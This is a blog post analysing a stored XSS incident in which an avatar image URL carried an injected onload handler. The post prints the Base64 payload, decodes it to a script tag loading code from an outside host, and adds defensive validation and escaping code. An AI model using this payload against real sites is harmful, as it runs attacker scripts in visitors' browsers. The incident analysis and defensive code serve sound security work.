Neurohazard
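Twilight clouds and a misty moon, studying the classics until the hair turns white; all things in the universe, thus have I heard.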

A JavaScript Hijacking Incident I Encountered

wpadmin~January 29, 2019 /InfoSec

XSS JavaScript hijacking

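Basic information

The user avatar interface was abused by a malicious attacker. The `src` value of the image node below contains a double quote followed by an injected `onload` handler: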

{
    "content": [
        {
            "t": "p",
            "a": {},
            "c": [
                {
                    "t": "k-tu",
                    "a": {
                        "id": "3FO3FNEBU9QB",
                        "src": "https://xxx.com/2019/01/19/SUQOUVOOS3SUIZ4XLQM6YNY8_180x90.jpg \" onload=\"document['write'](atob('PHNjcmlwdCBzcmM9Ly9hcGkuNTFiamJqLmNvbS9qPjwvc2NyaXB0Pg=='))\"\r\n"
                    }
                },
                "fhiahoiahrgaoerhgiuariuaprgaghaiurghauirehgapeurigaergaerhguiarhgap"
            ]
        }
    ]
}

Key malicious payload

" onload="document['write'](atob('PHNjcmlwdCBzcmM9Ly9hcGkuNTFiamJqLmNvbS9qPjwvc2NyaXB0Pg=='))"\r\n

The Base64 argument passed to atob() decodes to:

<script src=//api.51bjbj.com/j></script>

However, because the attacker quickly deleted the script hosted at https://api.51bjbj.com/j, no further analysis was possible.
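The payload depends on the `"` inside `src` closing the attribute when the value is rendered, so a check on stored content can flag it before it reaches a page. The following is an added example, not code from the original post or the affected site: it walks a content tree shaped like the JSON above and rejects any `src` that is not a clean https URL. The allowlisted host `img.example.com`, the function names and the sample document are assumptions made for illustration.

```javascript
'use strict';

// Assumption: avatars are only ever served from these hosts (hypothetical allowlist).
const ALLOWED_HOSTS = new Set(['img.example.com']);

// Returns null when the value is an acceptable image URL, otherwise a reason string.
function checkSrc(value) {
  if (typeof value !== 'string') return 'not a string';
  // Quotes, angle brackets, backticks, whitespace and control characters do not
  // belong in a well-formed URL and are what lets a value escape src="...".
  if (/["'<>`\s\u0000-\u001f\u007f]/.test(value)) return 'attribute-breaking character';
  let url;
  try { url = new URL(value); } catch { return 'not an absolute URL'; }
  if (url.protocol !== 'https:') return 'scheme not https';
  if (!ALLOWED_HOSTS.has(url.hostname)) return 'host not allowlisted';
  return null;
}

// Walk nodes of the form {t, a, c}; plain strings inside "c" are text and are skipped.
function findBadSrc(nodes, path = 'content', findings = []) {
  nodes.forEach((node, i) => {
    if (node === null || typeof node !== 'object') return;
    const here = `${path}[${i}]`;
    if (node.a && Object.prototype.hasOwnProperty.call(node.a, 'src')) {
      const reason = checkSrc(node.a.src);
      if (reason) findings.push({ path: `${here}.a.src`, reason });
    }
    if (Array.isArray(node.c)) findBadSrc(node.c, `${here}.c`, findings);
  });
  return findings;
}

// Output-side layer: escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(s) {
  return String(s).replace(/[&"'<>]/g, ch => `&#${ch.charCodeAt(0)};`);
}

// Constructed sample document (not the original data): one clean node, one tampered node.
const sample = { content: [{ t: 'p', a: {}, c: [
  { t: 'k-tu', a: { id: 'A', src: 'https://img.example.com/a_180x90.jpg' } },
  { t: 'k-tu', a: { id: 'B', src: 'https://img.example.com/b.jpg " onload="x()"\r\n' } },
  'plain text',
] }] };

console.log(findBadSrc(sample.content));
```

Validation on write and escaping on render are independent layers; either one alone would have stopped the quote from closing the attribute.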
